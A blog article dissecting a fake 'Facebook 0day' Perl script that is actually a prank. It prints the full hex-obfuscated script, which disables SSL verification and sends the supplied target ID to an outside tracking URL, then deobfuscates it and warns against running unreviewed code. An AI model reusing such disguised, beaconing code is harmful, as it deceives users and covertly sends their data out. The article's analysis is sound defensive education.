facepwn by Tyler L. Jones

This is the second article from Tyler L. Jones for The Cryptosphere. In it, he dissects the source code for an alleged Facebook zero day vulnerability.

Social engineering. It’s one of the most powerful tools in an attacker’s toolkit. It is the driving force behind successful phishing campaigns, and many other types of attacks. With that said, it is not limited to the technologically impaired. Social engineering can be incredibly powerful when used correctly. Even when used against people with an above-average understanding of computers. It is not often that it is publicly wielded against the technologically savvy, but when it is, the consequences are hilarious for everyone else watching.

This morning when I first logged on to Facebook, I went through my usual routine of checking my notifications. Like any other day, I had more notifications than I cared to go through. But one of them caught my eye immediately; it was a status update, posted by a friend. The title read: ‘Facepwn: A Facebook 0day for Reading Private Messages.’ Of course, such a tempting title intrigued me, so I had to check it out. Upon loading the page, I was greeted with the introduction to the tool. It read:

So after tampering around on the mobile site of Facebook (https://m.facebook.com); I came up with a very interesting and unique way to retrieve private messages from any user on Facebook!

Simply supply the victims Facebook id (navigate to their profile and grab it from the URL https://www.facebook.com/their.facebook.id123) to the script, and let the wizardry do its thing.

Coming from a background in Information Security, at this point I was already thinking to myself that surely such a vulnerability would not be this easily exploited. Skeptically, I read on. The developer went on to show example output; part of this example output demonstrated the simplicity behind his script. According to the developer, all you had to do was run the facepwn.pl script and give it a Facebook ID. The entire usage would look something like the following: facepwn.pl [Target’s Facebook ID]. Simple, right? We all know that script kiddies love tools like this – simplicity allows them to avoid the fact that they don’t actually know what they’re doing.

Next, the author left one final, cryptic message prior to the release of the source code for the perl script. It read:

Grab the source below and have a play. Please be responsible, and always know what you’re doing ;)

For the average script kiddie, such a message merely entices them to load the perl script up and immediately begin using the tool. Most won’t even look at the source – why should they? They likely wouldn’t understand the source code anyway. But for those that did pay attention, one will heed the author’s final warning: “… and always know what you’re doing.” After this final message, the source code followed.

#!/usr/bin/perl
#usage: facepwn.pl [target]
use warnings;
use strict;
use WWW::Mechanize;

# build the 0day exploit containing target name/facebook_ID
# returns network stack to ‘probe’ the backend mobile listener
# when listener is probed, data is leaked
# may require a flux capacitor

sub build_sploit{

my $target=shift;

   #buid payload

print “[+] Building sploit\n”;

my $OO0O0O=“\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65”;

my @OOO0=(“\x66\x61\x6b\x65\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x73\x74\x61\x63\x6b\x20\x6c\x6f\x6c”);

my $OO=“\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65”;

my $OOOO00=“\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65”;

#initiate network stack

my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});

my $OO00O=“\x4c\x6f\x6f\x6b\x73\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x64\x65\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x74\x68\x65\x20\x63\x6f\x64\x65\x2e\x2e\x2e”;

my $OO0=“\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x73\x69\x6d\x70\x6c\x65\x20\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x20\x74\x6f\x20\x73\x65\x65\x20\x68\x6f\x77\x20\x6d\x61\x6e\x79\x20\x70\x65\x6f\x70\x6c\x65\x20\x72\x75\x6e\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x62\x6c\x69\x6e\x64\x6c\x79”;

my $OO0O=“\x62\x6c\x6f\x67\x20\x70\x6f\x73\x74\x20\x72\x65\x76\x65\x61\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x20\x77\x69\x6c\x6c\x20\x62\x65\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x73\x6f\x6f\x6e\x2e\x2e\x2e\x73\x74\x61\x79\x20\x74\x75\x6e\x65\x64”;

my $OO000=“\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target”;

$OOO0O->get($OO000);

#build network stack

push @0000,$OO00O;
#push target ID onto stack
push @0000,$target;
push @0000,$OO0;
push @0000,$OO0O;
return @0000;

}

#build sploit from target {user_input}

my @payloads=build_sploit($ARGV[0]);

#iterate through the stack and fire payloads:

foreach(@payloads){

my $attack=WWW::Mechanize->new();

print “[+] Attacking $ARGV[0]…\n”;

if(my $attack=“x73\x3a\x2f\x2f” eq $_ ? 1 : 0){

my $messages=$attack->get(“https://m.facebook.com/m/01/messages/$_”);

print “[+] Success! Dumping data:\n”;

print $messages;

}else{

print “[!] Something went wrong, modify the payload.\n”;

exit 1;

}

}

Now, if something looks off about the above script, that is because it is. First and foremost, let me preface this with my own warning: You NEVER run obfuscated code, if you have not de-obfuscated it first. Doing so sets you up to who knows what. In the above source code, starting at line 15, we can see that the variables being declared within the perl script are, verily, obfuscated with the utilization of Hex. Let’s take a look at what this would look like without all of that hex-based obfuscation, shall we?

my $OO0O0O=“WWW::Mechanize”;

my @OOO0=(“fake network stack lol”);

my $OO=“SSL_verify_mode”;

my $OOOO00=“verify_hostname”;

#initiate network stack

my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});

my $OO00O=“Looks like you de-obfuscated the code…”;

my $OO0=“This is a simple experiment to see how many people run this code blindly”;

my $OO0O=“blog post revealing the data will be published soon…stay tuned”;

my $OO000=“https://phl4nk.co.vu/i_run_obfuscated_code? $target”;

Admittedly, I absolutely lost it at the “fake network stack lol” part. I could barely contain my laughter – and it was only 8:30 in the morning. I knew what I had to do – that is, once I finished laughing and could breathe again. I had to post this to 2600: The Hacker Quarterly’s Facebook group. I knew that lawls were going to ensue, and I was not disappointed. Within minutes, the comments began flooding in. But just as quickly as it was posted, people were quick to point out the obfuscation of the perl script.

Even with the obfuscation being pointed out, people were still falling for it. This leads us to the lesson for today: Don’t be a script kiddie. Actually know what it is you’re doing. If you rely on tools that you did not write, at least know the language they’re developed in and review the source code yourself. If you do not do this, you set yourself up for failure. You open yourself up to be vulnerable. If you don’t know what you’re doing, leave it to the people that do. You only make it harder for everyone else. Facepwn was a simple experiment; it utilized social engineering, and ultimately, psychology to demonstrate the mindset of the average script child. It was not malicious – but it could have been. Keep that in mind, the next time you use a script you did not write. You never really know what it’s doing on your system, or with your data.

Categories: Attack, Conspiracy, Cyber, Facebook, Hackers, News, OpSec, Programming, Pwnd, Security